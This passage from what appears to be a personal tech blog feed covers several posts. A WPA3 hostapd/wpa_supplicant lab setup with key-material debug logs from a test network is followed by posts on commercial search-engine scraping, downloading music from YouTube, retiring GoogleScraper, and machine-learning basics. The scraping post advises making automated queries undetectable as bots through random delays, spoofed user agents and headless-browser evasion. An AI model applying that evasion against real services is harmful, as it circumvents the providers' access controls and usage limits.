sudo iwconfig <span class="nv">$1</span> mode monitor
sudo ifconfig <span class="nv">$1</span> up
<span class="c1"># To monitor traffic in wireshark you can execute</span>
<span class="c1"># sudo ifconfig hwsim0 up</span>
<span class="k">fi</span>
</code></pre></div>
<p>Execute the script with:</p>
<div class="highlight"><pre><span></span><code>chmod +x prepare.sh
./prepare wlan0
</code></pre></div>
<p>Now we can finally start hostapd with</p>
<div class="highlight"><pre><span></span><code>./hostapd wpa3.conf -dd -K
</code></pre></div>
<h3>Configure wpa_supplicant to connect to the wpa3 network</h3>
<p>This commands need to be executed on the laptop (host machine).</p>
<p>First compile wpa_supplicant similar to how we compiled hostapd:</p>
<div class="highlight"><pre><span></span><code>wget https://w1.fi/releases/wpa_supplicant-2.7.tar.gz
tar xzvf wpa_supplicant-2.7.tar.gz
<span class="nb">cd</span> wpa_supplicant-2.7/wpa_supplicant
</code></pre></div>
<p>Append <code>CONFIG_SAE=y</code> to <strong>defconfig</strong></p>
<p>then</p>
<div class="highlight"><pre><span></span><code>cp defconfig .config
make -j <span class="m">2</span>
<span class="nb">cd</span> ..
</code></pre></div>
<p>then save the supplicant configuration as <strong>supp.conf</strong> with the following contents:</p>
<div class="highlight"><pre><span></span><code>network={
ssid="WPA3-Network"
psk="abcdefgh"
key_mgmt=SAE
#ieee80211w=2
}
</code></pre></div>
<p>Kill all interfering processes with the following commands:</p>
<div class="highlight"><pre><span></span><code>sudo service network-manager stop
sudo pkill wpa_supplicant
</code></pre></div>
<p>Then run the supplicant with</p>
<div class="highlight"><pre><span></span><code>sudo ./wpa_supplicant -D nl80211 -i wlan0 -c supp.conf -K -dd
</code></pre></div>
<h2>Results</h2>
<p>This are the outputs of the logfiles:</p>
<ul>
<li><a href="/data/supplicant_wpa3.log">wpa_supplicant log outputs</a></li>
<li><a href="/data/hostapd_wpa3.log">hostapd log outputs</a></li>
</ul>
<p>The interesting parts are the following exerpt from the wpa_supplicant logfile:</p>
<div class="highlight"><pre><span></span><code>SAE: counter = 40
SAE: pwd-seed - hexdump(len=32): af c2 76 6d e8 b7 ab c3 df da 4c 40 8d 04 a3 65 f8 03 90 2f d0 f9 ea cb 5b 41 63 6e cb 14 d3 ab
SAE: pwd-value - hexdump(len=32): d5 79 09 44 00 2f 7d ca 0e 6b 82 22 37 00 ea 43 84 c0 75 94 7e eb 40 74 c4 55 a6 62 1b 0e e8 da
Get randomness: len=32 entropy=0
Get randomness: len=32 entropy=0
Get randomness: len=32 entropy=0
SAE: own commit-scalar - hexdump(len=32): b0 d9 b4 04 38 49 44 4d 5b dd f7 ff 3d 3f 0d 4a 81 d7 bb f5 66 dc 4f cb ee 95 90 0d 9e 88 46 ef
SAE: own commit-element(x) - hexdump(len=32): ed 6b 81 c3 42 bb f1 9c 27 6f 87 98 07 37 ce cf 28 2e c0 81 75 16 e7 d0 0b db f6 de 8c 7b 26 0e
SAE: own commit-element(y) - hexdump(len=32): 90 ab e3 58 aa 19 64 12 15 2e ce bc 23 e2 10 25 3f e1 10 31 1b 1f 3d 4b 67 e1 44 25 94 c0 10 e0
EAPOL: External notification - EAP success=0
EAPOL: External notification - EAP fail=0
EAPOL: External notification - portControl=Auto
wlan0: Cancelling scan request
wlan0: SME: Trying to authenticate with 9c:ef:d5:fc:0e:a8 (SSID='WPA3-Network' freq=2412 MHz)
EAPOL: External notification - portValid=0
wlan0: State: SCANNING -> AUTHENTICATING
nl80211: Authenticate (ifindex=3)
* bssid=9c:ef:d5:fc:0e:a8
* freq=2412
* SSID - hexdump_ascii(len=12):
57 50 41 33 2d 4e 65 74 77 6f 72 6b WPA3-Network
* IEs - hexdump(len=0): [NULL]
* auth_data - hexdump(len=102): 01 00 00 00 13 00 b0 d9 b4 04 38 49 44 4d 5b dd f7 ff 3d 3f 0d 4a 81 d7 bb f5 66 dc 4f cb ee 95 90 0d 9e 88 46 ef ed 6b 81 c3 42 bb f1 9c 27 6f 87 98 07 37 ce cf 28 2e c0 81 75 16 e7 d0 0b db f6 de 8c 7b 26 0e 90 ab e3 58 aa 19 64 12 15 2e ce bc 23 e2 10 25 3f e1 10 31 1b 1f 3d 4b 67 e1 44 25 94 c0 10 e0
* Auth Type 4
nl80211: Authentication request send successfully
nl80211: Event message available
nl80211: Drv Event 19 (NL80211_CMD_NEW_STATION) received for wlan0
nl80211: New station 9c:ef:d5:fc:0e:a8
nl80211: Event message available
nl80211: Drv Event 37 (NL80211_CMD_AUTHENTICATE) received for wlan0
nl80211: MLME event 37 (NL80211_CMD_AUTHENTICATE) on wlan0(c8:f7:33:d4:5a:e9) A1=c8:f7:33:d4:5a:e9 A2=9c:ef:d5:fc:0e:a8
nl80211: MLME event frame - hexdump(len=128): b0 00 3a 01 c8 f7 33 d4 5a e9 9c ef d5 fc 0e a8 9c ef d5 fc 0e a8 e0 1a 03 00 01 00 00 00 13 00 8c d8 b9 1c d9 d4 c1 1e 9b 55 2b 1e c7 cc 15 6d d7 e1 80 c0 cd 19 10 40 4a 14 27 1d 23 51 bf 00 76 ea 86 3b b4 b6 13 2f 1e 8d ba 94 a2 85 e6 28 cf 8b 45 4b 85 ad 3d 3a a2 47 74 39 3a 4a 68 06 a4 fa 78 d9 1c de 93 94 66 af ff 76 1e 2d 4f a7 c4 40 5a 0f f4 df 1c 5d 5a 47 88 39 84 7d 52 e0
nl80211: Authenticate event
wlan0: Event AUTH (10) received
wlan0: SME: Authentication response: peer=9c:ef:d5:fc:0e:a8 auth_type=3 auth_transaction=1 status_code=0
SME: Authentication response IEs - hexdump(len=98): 13 00 8c d8 b9 1c d9 d4 c1 1e 9b 55 2b 1e c7 cc 15 6d d7 e1 80 c0 cd 19 10 40 4a 14 27 1d 23 51 bf 00 76 ea 86 3b b4 b6 13 2f 1e 8d ba 94 a2 85 e6 28 cf 8b 45 4b 85 ad 3d 3a a2 47 74 39 3a 4a 68 06 a4 fa 78 d9 1c de 93 94 66 af ff 76 1e 2d 4f a7 c4 40 5a 0f f4 df 1c 5d 5a 47 88 39 84 7d 52 e0
wlan0: SME: SAE authentication transaction 1 status code 0
wlan0: SME SAE commit
SAE: Peer commit-scalar - hexdump(len=32): 8c d8 b9 1c d9 d4 c1 1e 9b 55 2b 1e c7 cc 15 6d d7 e1 80 c0 cd 19 10 40 4a 14 27 1d 23 51 bf 00
SAE: Peer commit-element(x) - hexdump(len=32): 76 ea 86 3b b4 b6 13 2f 1e 8d ba 94 a2 85 e6 28 cf 8b 45 4b 85 ad 3d 3a a2 47 74 39 3a 4a 68 06
SAE: Peer commit-element(y) - hexdump(len=32): a4 fa 78 d9 1c de 93 94 66 af ff 76 1e 2d 4f a7 c4 40 5a 0f f4 df 1c 5d 5a 47 88 39 84 7d 52 e0
SAE: Possible elements at the end of the frame - hexdump(len=0):
SAE: k - hexdump(len=32): 58 4a a1 15 2d 2b 89 37 11 27 6c 12 36 8e 3a 6c ed a8 06 7d fd 46 d4 9f 97 76 91 7f 66 b7 5f 3e
SAE: keyseed - hexdump(len=32): 77 21 44 e0 10 2c c9 05 4c 24 5a 9a 5f fb fb d6 9d be 1c 08 4d e8 7a b1 84 d7 8e 33 73 fb 55 5a
SAE: PMKID - hexdump(len=16): 3d b2 6d 22 12 1e 05 6a f7 33 23 1e 05 0b 22 b8
SAE: KCK - hexdump(len=32): 5e b5 32 c6 88 22 ad c9 7d 43 33 e9 b9 ea 7a 94 32 40 f0 a1 ed e8 7b af 5a 58 16 af 5a ff 46 57
SAE: PMK - hexdump(len=32): d8 ee 92 4b ba ff e4 7b 2f ea 85 5f be 12 fb f2 89 38 ad 8f 92 ec 99 3d 20 2f 10 76 9f e9 1a 38
wlan0: Automatic auth_alg selection: 0x1
wlan0: Using SAE auth_alg
RSN: PMKSA cache search - network_ctx=0x5566b646f620 try_opportunistic=0 akmp=0x0
RSN: Search for BSSID 9c:ef:d5:fc:0e:a8
RSN: No PMKSA cache entry found
wlan0: RSN: using IEEE 802.11i/D9.0
wlan0: WPA: Selected cipher suites: group 16 pairwise 16 key_mgmt 1024 proto 2
wlan0: WPA: Selected mgmt group cipher 32
wlan0: WPA: clearing AP WPA IE
WPA: set AP RSN IE - hexdump(len=22): 30 14 01 00 00 0f ac 04 01 00 00 0f ac 04 01 00 00 0f ac 08 00 00
wlan0: WPA: using GTK CCMP
wlan0: WPA: using PTK CCMP
wlan0: RSN: using KEY_MGMT SAE
wlan0: WPA: not using MGMT group cipher
WPA: Set own WPA IE default - hexdump(len=22): 30 14 01 00 00 0f ac 04 01 00 00 0f ac 04 01 00 00 0f ac 08 00 00
WPA: Leave previously set WPA IE default - hexdump(len=22): 30 14 01 00 00 0f ac 04 01 00 00 0f ac 04 01 00 00 0f ac 08 00 00
RRM: Determining whether RRM can be used - device support: 0x10
RRM: No RRM in network
Added supported operating classes IE - hexdump(len=19): 3b 11 51 51 53 54 73 74 75 76 77 78 79 7a 7b 7c 7d 7e 7f
RSN: PMKSA cache search - network_ctx=0x5566b646f620 try_opportunistic=0 akmp=0x400
RSN: Search for BSSID 9c:ef:d5:fc:0e:a8
RSN: No PMKSA cache entry found
EAPOL: External notification - EAP success=0
EAPOL: External notification - EAP fail=0
EAPOL: External notification - portControl=Auto
wlan0: Cancelling scan request
wlan0: SME: Trying to authenticate with 9c:ef:d5:fc:0e:a8 (SSID='WPA3-Network' freq=2412 MHz)
EAPOL: External notification - portValid=0
wlan0: State: AUTHENTICATING -> AUTHENTICATING
nl80211: Authenticate (ifindex=3)
* bssid=9c:ef:d5:fc:0e:a8
* freq=2412
* SSID - hexdump_ascii(len=12):
57 50 41 33 2d 4e 65 74 77 6f 72 6b WPA3-Network
* IEs - hexdump(len=0): [NULL]
* auth_data - hexdump(len=38): 02 00 00 00 00 00 bd 5a c1 80 bb 5a 5c 3c c7 c0 56 ab a3 d0 8a a3 8c 58 a0 79 00 e2 17 be 3a f1 fe 47 68 c6 26 11
* Auth Type 4
nl80211: Authentication request send successfully
nl80211: Event message available
nl80211: Drv Event 20 (NL80211_CMD_DEL_STATION) received for wlan0
nl80211: Delete station 9c:ef:d5:fc:0e:a8
nl80211: Event message available
nl80211: Drv Event 19 (NL80211_CMD_NEW_STATION) received for wlan0
nl80211: New station 9c:ef:d5:fc:0e:a8
nl80211: Event message available
nl80211: Drv Event 37 (NL80211_CMD_AUTHENTICATE) received for wlan0
nl80211: MLME event 37 (NL80211_CMD_AUTHENTICATE) on wlan0(c8:f7:33:d4:5a:e9) A1=c8:f7:33:d4:5a:e9 A2=9c:ef:d5:fc:0e:a8
nl80211: MLME event frame - hexdump(len=64): b0 00 3a 01 c8 f7 33 d4 5a e9 9c ef d5 fc 0e a8 9c ef d5 fc 0e a8 f0 1a 03 00 02 00 00 00 00 00 31 f6 23 46 42 56 06 9f 8b da 5a 7b ef 66 6f 1a 43 7f 78 ce 1c 19 fb b1 c7 35 20 27 a2 72 e1 ea
nl80211: Authenticate event
wlan0: Event AUTH (10) received
wlan0: SME: Authentication response: peer=9c:ef:d5:fc:0e:a8 auth_type=3 auth_transaction=2 status_code=0
SME: Authentication response IEs - hexdump(len=34): 00 00 31 f6 23 46 42 56 06 9f 8b da 5a 7b ef 66 6f 1a 43 7f 78 ce 1c 19 fb b1 c7 35 20 27 a2 72 e1 ea
wlan0: SME: SAE authentication transaction 2 status code 0
wlan0: SME SAE confirm
SAE: peer-send-confirm 0
SME: SAE completed - setting PMK for 4-way handshake
</code></pre></div>
<p>At the end you can see the message <strong>SME: SAE completed - setting PMK for 4-way handshake</strong>.</p>
<p>This tells us that SEA was used to derive a PMK that will be used for the 4-way handshake.</p>
<h2>Open questions</h2>
<p>Unfortunately I could not manage to support <code>ieee80211w=2</code> in my configuration.</p>
<p>The reason is probably because the drivers do not support the ieee80211w amendment.</p>Scraping search engines in 20192019-02-04T18:00:00+01:002019-02-04T18:00:00+01:00Nikolai Tschachertag:incolumitas.com,2019-02-04:/2019/02/04/scraping-search-engines-in-2019/<p>Modern scraping now is mostly done with real browsers, configured to behave like real humans.</p><p>When I started developing a simple Python script in 2012, which later would become the open source software <a href="https://github.com/NikolaiT/GoogleScraper">GoogleScraper</a>, I needed to stay up to date with the latest web technology. Since then, I developed a love-hate relationship with web scraping. One the one side, being able to scrape websites in large quantities gives you instant access to the most up-to-date information of the world. On the other side, web scraping is inherently a unstable business, because you are a third party source and rely on the provider (such as Google or Bing). The provider can change their markup at every time, ban IP ranges at will and make your life extremely annoying.</p>
<h3>Web Crawling</h3>
<p>Search engine scraping can be considered crawling of search engines. The result is a meta search engine. Search engines themselves are huge web scrapers. But instead of scraping, they call the process <em>web crawling</em>. There are many open source web crawlers such as <a href="http://nutch.apache.org/">Apache Nutch</a> or the <a href="http://stormcrawler.net">Storm Crawler</a>. They all are capable of indexing a complete web page by recursively following all the links encountered during the crawling process. Usually, those programs respect the crawling policy determined by the <code>robots.txt</code> file and try to avoid being a heavy burden on the crawled page.</p>
<p>If you as an individual (or as a small company) are seriously interested in deploying your own crawler for many million URL's, you should probably realize that you are dealing with Big Data problems. This almost instantly means a whole new programming paradigm called the <a href="https://en.wikipedia.org/wiki/MapReduce">MapReduce programming model</a> and involves coordinating resources distributed on potentially many different machines. This is expensive and the learning curve is not straightforward. Even though I have a computer science degree (M. Sc.), I would not start such a project without precisely specifying the goals and steps in such a project and considering the possibility that it will be too hard/expensive for a small team (pessimistic view). Additionally, such projects almost always involve spending money for hardware infrastructure (such as Amazon EC2 instances) to launch your crawl.</p>
<p>Therefore, it is advised to start a project that depends on web crawling by analyzing the <a href="http://commoncrawl.org/">CommonCrawl</a> project beforehand. They are crawling the web since 10 years and make their crawling corpus available for free. This enables you to bootstrap your project idea and go right to the step where you determine whether your business idea is still valid with real world data.</p>
<p>Then there is for example <a href="https://scrapy.org/">scrapy</a>, a large and well maintained scraping/crawling library written in Python. Scrapy is a mix between crawler and scraping framework. They abstract the whole crawling process into a powerful framework. Scrapy for example has a downloader middleware that allows you to plug in random proxy selection mechanisms in order to anonymize the individual requests to the target site.</p>
<h3>Port Scanning</h3>
<p>Then there are other amazing open source programs such as <a href="https://zmap.io/">ZMap</a> or <a href="https://github.com/robertdavidgraham/masscan">Masscan</a> which allow you to port scan the entire internet within hours (yes, the whole <code>2^32</code> IP addresses). Those port scanners can be considered crawlers for lower level TCP/IP protocols. Maybe your business idea is to create a low level meta search engine that answers queries such as</p>
<ul>
<li>How many hosts with open port 80 have nginx version X installed?</li>
<li>What percentage of real world TLS/SSL implementation use the ellipitic curve <code>NIST P-256</code> ?</li>
<li>How many webservers have a <code>phpinfo.php</code> laying around the root of the webserver?</li>
</ul>
<p>To answer these questions, you need to port scan a significant subset of the complete Internet.</p>
<p>Those questions are for example extremely interesting for security researches (as well as blackhat hackers).</p>
<h3>Scraping Search Engines</h3>
<p>In the case of <a href="https://scrapeulous.com/">scrapeulous.com</a>, we have specialized in scraping a representative set of search engines such as Google, Bing, Duckduckgo and others.</p>
<p>In our opinion, it is actually a shame that such a small amount of companies (Google, Facebook, Twitter, Microsoft) almost completely monopolizes the whole Internet. </p>
<p>They can determine which user (by IP) from which region (Geo Location) will see what content of their services. The can determine the usage limits of viewing their pages. </p>
<p>And they are only interested in human users of course. They don't want too feed bots with information that costs them valuable resources. </p>
<p>The interest in real human beings is of course understandable. Real human beings can make purchase decisions, are easily influenced by advertisements and produce valuable data.</p>
<p>This exactly is the motivation for scraping search engines. </p>
<p>We at <a href="https://scrapeulous.com/">scrapeulous.com</a> thrive to imitate real human search behavior as closely as possible. For this reason, we follow those guidelines that constitute <strong>best practices in modern web scraping from 2019</strong>:</p>
<ol>
<li>
<p>The customer must be able to launch a scrape job over many keywords (quantity).</p>
</li>
<li>
<p>The region from where the searches originate should be consistent. This means that a scrape job should have the same IP address from the same geographical region/country.</p>
</li>
<li>
<p>Scraping should be done by launching real browsers. For example <a href="https://scrapeulous.com/">scrapeulous.com</a> uses the well maintained browser automation library <a href="https://github.com/GoogleChrome/puppeteer">puppeteer</a></p>
</li>
<li>
<p>It should be impossible to detect that the search originated from a bot. This is achieved by randomizing requests with delays, valid user agents and following guidelines such as the one <a href="https://intoli.com/blog/not-possible-to-block-chrome-headless/">published here</a>.</p>
</li>
</ol>
<h3>Use cases of search engine scraping</h3>
<p>Honestly, using a service such as <a href="https://scrapeulous.com/">scrapeulous.com</a> is motivated by the same reasons why we use search engines like Google in our everyday life. The only difference is that <a href="https://scrapeulous.com/">scrapeulous.com</a> allows to search in large quantities.</p>
<p>The most prominent use cases are the following:</p>
<ul>
<li>
<p>Scientist need data and usually they need a lot of data for empirical studies. Searching 10k keywords manually will take you several days.</p>
</li>
<li>
<p>Marketing and business analysts need to know how, and through which keywords their sites are discovered. By creating many different keyword combinations and analyzing the results algorithmically, it's much easier to derive knowledge.</p>
</li>
<li>
<p>Often business decision depend on data published in search engines. Scraping search engines makes a lot of sense in those cases.</p>
</li>
</ul>Programming to improve your life2019-01-02T22:38:00+01:002019-02-13T21:30:00+01:00Nikolai Tschachertag:incolumitas.com,2019-01-02:/2019/01/02/programming-to-improve-your-life/<p>Making use of programming skills</p><p><strong>In short</strong>: I am fed up with bad music and music apps and streaming platforms such as Spotify, Soundcloud or Youtube.
That's why I search for objectively good music playlists on the Internet, download the songs from Youtube don't care about music supply for a couple of years.
My main issue with existing music platforms: Any algorithm giving me suggestions based on my past music taste doesn't factor in that I might in fact have a bad music taste.</p>
<p>I am now programming for almost 10 years. I have almost finished my M. Sc. in computer science. I developed many projects in a wide range of programming languages
in the past years, many projects which I abandoned early, too much blog post that were never completed.
So much buggy code, too many bad choices.</p>
<p>To be honest, I don't think I ever created a piece of software that I was truly satisfied with. I have come to terms that I am an average
programmer trying to make a living with it.</p>
<p>About three years ago, I caught myself listening to the same few songs again and again that I had saved on my smartphone.
Even though I would consider myself savy in many areas of information technology, streaming platforms like Spotify
or Soundcloud neaver managed to convince me.</p>
<p>Therefore, my usual approach was to download some songs from youtube that I already knew. I saved them to my phone and listened
them until I couldn't hear them anymore. Once in a while, I found fresh artists on youtube and I added them to my small
collection of music.</p>
<p>I tried the free version of spotify, but the advertisements were too annoying for me. Furthermore, I couldn't imagine spending 10$ a month
for their service. Why bother paying for music when you can have it for free on youtube?</p>
<p>To be honest, not wanting to pay 10$ is a bad argument, since I pay for many other useless services much more money
(such as my amazon prime account, which I almost never use).</p>
<p>Nevertheless, something inside me wants to remain independent and free. I don't want to become enslaved by spotify and provide them with my valuable user data.
I don't want them to give money for such a mediocre business idea. So what is the alternative?</p>
<p>I heard there is also <a href="https://music.youtube.com/">youtube music</a> now. Basically a version of youtube that is focused on music videos.
I briefly tried it out and it let me chose the artists and songs that I already was aware of.</p>
<p>That's not what I want. I want music that I don't know yet and that many people collectively like. <strong>Any algorithm giving me suggestions
based on my past music taste doesn't factor in that I might in fact have a bad music taste.</strong></p>
<h3>Love for the Unknown</h3>
<p>I want to find quality music I am not aware of yet. To summarize, my goals are the following:</p>
<ul>
<li>I don't want to be dependent on an active internet connection. More often than not, I reach my monthly data limit on my smartphone
and can't listen too good music anymore. Further reasons: flights or foreign countries with roaming fees.</li>
<li>I don't want to subsribe to a music service such as Spotify or Youtube Music. I dislike downloading apps and giving away user data.</li>
<li>Advertisements are from hell and completely neutralises any happiness that stems from listening to cool songs. Therefore, I
must avoid free spotify or youtube music.</li>
<li>I like to own the actual MP3 files.</li>
</ul>
<p>So what do I need to do? </p>
<ol>
<li>I need to identify objective reliable sources of <strong>what good music is</strong></li>
<li>I need to compile a list of the songs</li>
<li>A script to search and download the titles from youtube needs to be programmed.</li>
</ol>
<h3>Finding sources</h3>
<p>Have you tried browsing youtube for music? The algorithm is broken. It just doesn't work. It's not smarter than the user. And the
user doesn't know what good music constitutes. <em>That's why he is searching</em>.</p>
<p>Because many people are much smarter and more experienced then me, let's aks them what they consider to be good music.</p>
<p>The more people commented, the better the playlist will be. For example <a href="https://www.reddit.com/r/AskReddit/comments/5rsyjw/what_song_is_a_1010_yet_hardly_anybody_has_heard/">this reddit thread</a>
from 2017 is pure gold. 7100 comments and people <a href="https://play.google.com/music/preview/pl/AMaBXykqYrojBN3OnyGTPB5kiST-yZrtALFcPLtU3CTtRawBcb2kNNd9-rvIkR781-EICggcECLAOCdEsoNsSz4e-0ZgdNdUTQ==">even made a playlist</a> from the top comments. This saves some work.</p>
<h4>Approach: Search past reddit threads of the form "What is your favourite song?"</h4>
<p>A good idea is to search the internet for recent (in the past two years) threads where people name their favourite songs.</p>
<ul>
<li>https://www.reddit.com/r/AskReddit/comments/5rsyjw/what_song_is_a_1010_yet_hardly_anybody_has_heard/</li>
<li>https://www.reddit.com/r/AskReddit/comments/6iqvmw/what_is_your_favorite_song/</li>
<li>https://www.reddit.com/r/AskReddit/comments/2akyrk/what_is_your_favourite_song_of_all_time/</li>
<li>https://www.reddit.com/r/AskReddit/comments/16jtpa/what_is_the_most_beautiful_song_youve_ever_heard/ Old but still relevant</li>
<li>https://www.reddit.com/r/SpotifyPlaylists/top/?t=all</li>
</ul>
<p>And I searched especially for classical music because I am a huge noob in this part of music:</p>
<ul>
<li>https://www.reddit.com/r/AskReddit/comments/1gea1e/what_are_the_most_beautiful_pieces_of_classical/</li>
<li>https://www.reddit.com/r/AskReddit/comments/1oppdn/whats_your_favorite_piece_of_classical_music_why/</li>
<li>https://www.reddit.com/r/classicalresources/comments/13mteq/a_playlist_of_20_great_classical_works_for/</li>
<li>https://open.spotify.com/playlist/4bAquhPmrdqGpfHWLwhloh</li>
<li>https://www.reddit.com/r/classicalmusic/comments/85vsnq/most_moving_classical_pieces/</li>
</ul>
<p>And then I also searched for all kinds of electronic music, house music, EDM, techno and so on:</p>
<ul>
<li>https://www.reddit.com/r/EDM/comments/7abjf8/what_is_your_favorite_edm_song_of_all_time/</li>
<li>https://www.reddit.com/r/Techno/comments/20yce8/best_feel_good_techno_song_of_all_time/</li>
</ul>
<p>Then I search for threads were people should name songs that <em>everyone knows but can't associate a name to it</em>.</p>
<ul>
<li>https://www.reddit.com/r/AskReddit/comments/848sz0/whats_a_1010_song_that_not_many_people_know_about/</li>
<li>https://www.reddit.com/r/AskReddit/comments/5rsyjw/what_song_is_a_1010_yet_hardly_anybody_has_heard/</li>
</ul>
<h4>Compile meta list from existing playlist</h4>
<ul>
<li>https://www.reddit.com/r/Music/comments/8lhw1o/i_made_a_spotify_playlist_of_the_best_songs_ever/</li>
<li>https://open.spotify.com/playlist/6uYt5DwcyaOxxPUundboC2?si=RJn2frzTRwOVAKRJFWyZxA</li>
<li>https://open.spotify.com/playlist/1cAHI20k456593GCBNqzw6</li>
<li>https://www.reddit.com/r/Music/comments/79mpf3/i_made_a_spotify_playlist_from_the_reddit/</li>
<li>https://open.spotify.com/playlist/79dEZteWKyQJTOyURURnyX</li>
<li>
<p>https://open.spotify.com/playlist/7CseXkRUYWMS6jm0VafGlN?si=ifApvK9MSneaiDSLUj7NpQ</p>
</li>
<li>
<p>Collaborative: https://open.spotify.com/user/haeltotoe/playlist/62SJFBkvpmR0Z6MIa9v13I?si=zteIfdJ9RbW0g6rIxNr3FA</p>
</li>
</ul>
<h4>Existing Google Play Lists: https://play.google.com</h4>
<ul>
<li>https://play.google.com/music/preview/pl/AMaBXynbKSugHYaAeEOzFdDN1RXRtgQ99Bn6aUkTDEbmn3mEQ0rGmGYjBJuN5fGhDYefF1-O-iItTfzrHJ35DQiI8_R4J6bnfQ==</li>
</ul>
<h4>Use Github as a data source</h4>
<p>For example <a href="https://github.com/angrbrd/top5000-playlist/blob/master/TopSongs.csv">this javascript application</a> features a list of 5000 top songs mostly from the United States. The most recent songs date back to 2013.
I won't use this list because there are too many generic pop songs in it.</p>
<p>This <a href="https://gist.github.com/manios/4515112">personal gist</a> of a github user named manios is much better in my opinion, because the list directly includes Youtube links.
However, it is too opinionated.</p>
<h3>The End Result</h3>
<p>Of course I needed to base my list on upvotes from reddit or trust random people from spotify.</p>Discontinuation of GoogleScraper2018-12-24T18:00:00+01:002018-12-24T18:00:00+01:00Nikolai Tschachertag:incolumitas.com,2018-12-24:/2018/12/24/discontinuation-googlescraper/<p>Discontinuation of GoogleScraper in favor of https://www.npmjs.com/package/se-scraper</p><p>in this blog post I am going to briefly outline the reasons why I decided to stop
developing the GoogleScraper Python3 module.</p>
<ol>
<li>Python is not the language/framework for modern scraping. Node/Javascript is. The reason is puppeteer. puppeteer is the de-facto standard for controlling and automatizing web browsers (especially Chrome). GoogleScraper however uses Selenium. Selenium is kind of old and outdated.</li>
<li>Scraping in 2019 is almost completely reduced to controlling webbrowsers. There is no longer any need to scrape directly on the HTTP protocol level. It's too bugy and detectable by anit-bot mechanisms. And GoogleScraper still supports raw http requests.</li>
<li>Scraping should be parallelized in the cloud or among a set of dedicated machines. GoogleScraper cannot handle such use cases without significant effort.</li>
<li>GoogleScraper's architecture is too complicated. Additionally, the code base is too bugy and long scraping jobs are notoriously unreliable. </li>
</ol>
<h2>https://www.npmjs.com/package/se-scraper</h2>
<p>Instead I will maintain a small node library based on puppeteer that scrapes a range of popular search engines.</p>
<p>This project will never become complicated and will instead focus on small scrape jobs. If you want to scrape a
large amount of keywords, you can pay so on <a href="https://scrapeulous.com/">scrapeulous.com</a> or you can hire me directly as a programmer.</p>
<p>For simple use cases, https://www.npmjs.com/package/se-scraper is more than enough.</p>
<p>For this node module I will focus on keeping up to date with html changes of the search engines and will guarantee that basic scraping functionality is working. Large features won't be implemented however.</p>Introduction to Machine Learning in 20192018-11-18T15:37:00+01:002018-11-18T15:37:00+01:00Nikolai Tschachertag:incolumitas.com,2018-11-18:/2018/11/18/introduction-machine-learning-2019/<p>Gentle Introduction into machine learning in 2019</p><h2>Introduction to machine learning</h2>
<p>This is the beginning of a blog post series that dives into the art of machine learning.</p>
<p>In the past months, I worked a lot with data and I learned that I need to understand the algorithms and problem solving strategies that modern machine learning brings along. To teach myself those concepts, I will
create a series of blog posts that cover the fundamentals and some advanced algorithms in machine learning.</p>
<p>The general approach of this blog post series is breadth fist, with the occasional in depth analysis of a interesting algorithm. I try to intuitively understand some concepts, but I will select a few explanatory problems to introduce algorithms and code.</p>
<p>This is the first blog post of this series and will cover <strong>a introduction into machine learning</strong> as well as
the <strong>statistical basics</strong> of machine learning. I will mostly work with <strong>Python3</strong> and the <strong>Anaconda Python</strong> distribution, since I am familiar with those tools.</p>
<p>This introduction will cover the following topics:</p>
<ol>
<li>Some relevant stuff from probability theory and statistics as mathematical background</li>
<li>Basic algorithms in machine learning such as Bayes and K-Means algorithm</li>
</ol>
<h2>Typical problems that machine learning aims to solve</h2>
<ul>
<li>machine learning is heavily used in search engine ranking. Algorithms learn based on a wide range of parameters which search results are requested most likely by what kind of user</li>
<li>Translation of texts within two languages. One approach in translating any text to another text would be to crawl all pages that have mulitlangual support and learn how to translate any text based on this sample set. </li>
<li>Another example would be classification of faces in images to a label such as the persons name. This is what facebook and instagram do with the images the user uploaded. </li>
<li>Further well known examples are speech recognition or writing recognition. The aim in those tasks is to translate audio recordings to text and to translate images of handwriting to text.</li>
</ul>
<p>A special problem that is of major interest for me is the following:</p>
<p>I want to <strong>recognize news articles</strong> soley based on one input: A link to the document. The algorithm should automatically recognize whether the link shows to a news article and should be able to identify the relvant pieces of information which constitutes a news article: </p>
<ul>
<li>An heading</li>
<li>A publication date</li>
<li>Optionally a author name</li>
<li>Optionally a short description</li>
<li>The article itself</li>
</ul>
<h2>Problem Sets</h2>
<p>A problem falls within <strong>Binary Classification</strong> when our algorithm needs to make a statement whether a value falls in class zero or class one. For example when our machine learning algorithm makes a statement whether a credit card purchase is fraudulent or not, it makes a binary classification.</p>
<p><strong>Multiclass Classification</strong> is the extension of <strong>Binary Classification</strong>. The goal random variable <span class="math">\(y \in {1, ..., n}\)</span> can now assume a range of different values. For example we want to classify patient data sets into different levels of health risk based on a range of input factors (very healthy, healthy, ill, terminally ill).</p>
<p><strong>Regression</strong> estimates for example the value of a stock in the future or the yield of a business based on past income data or any data point which follows a asummed regression function.</p>
<p><strong>Novelty Detection</strong> is a set of problems that search for a metric to detect novel data based on known data from the past.</p>
<h2>Some probability theory</h2>
<p>I assume that the reader has general knowledge of what a random variable is (for example a dice roll).</p>
<p>A random variable in general maps an event to an result (for example a number). For example a coin toss takes two different outcomes, heads and numbers. Thus this random variable <span class="math">\(X\)</span> maps the coin toss into the set <span class="math">\({heads, numbers}\)</span>.</p>
<p>A random variable can be discrete (coin toss, two outcomes) or continuous (height of person, indefinitely many measurements).</p>
<p>Another important concept is this of <strong>distributions</strong>. The probability density function (PDF) always integrates to one.</p>
<p>For example two very important and well known distributions are the <strong>uniform distribution</strong> and the <strong>normal distribution</strong>. The uniform distribution has the same probability for each <span class="math">\(x\)</span> to appear in a interval <span class="math">\([a,b]\)</span>. The formula for the uniform distribution is:
</p>
<div class="math">$$
U(X=x)=
\begin{cases}
\frac{1}{b-a}, \text{if} x \in [a,b]\\
0, \text{otherwise}\\
\end{cases}
$$</div>
<p>and the formula for the normal or <strong>Gaussian distribution</strong> is:</p>
<div class="math">$$
N(X=x)= \frac{1}{\sqrt{2\pi\sigma^2}}\exp{\big(-\frac{(x-\mu)^2}{2\sigma^2}\big)}
$$</div>
<p>where <span class="math">\(\sigma\)</span> is the variance and <span class="math">\(\mu\)</span> is the center/mean of the distribution.</p>
<p><img alt="Uniform and Normal Distribution" src="https://incolumitas.com/images/ml-figure1.png"></p>
<p>An important concept is also to compute the <strong>cumulative distribution function (CDF)</strong> <span class="math">\(F\)</span> for probability distributions. In general, we integrate over an interval <span class="math">\([a,b]\)</span> to be able to make range queries on the CDF:</p>
<div class="math">$$
P(a \leq X \leq b) = \int_a^b P(X=x) = F(b) - F(a)
$$</div>
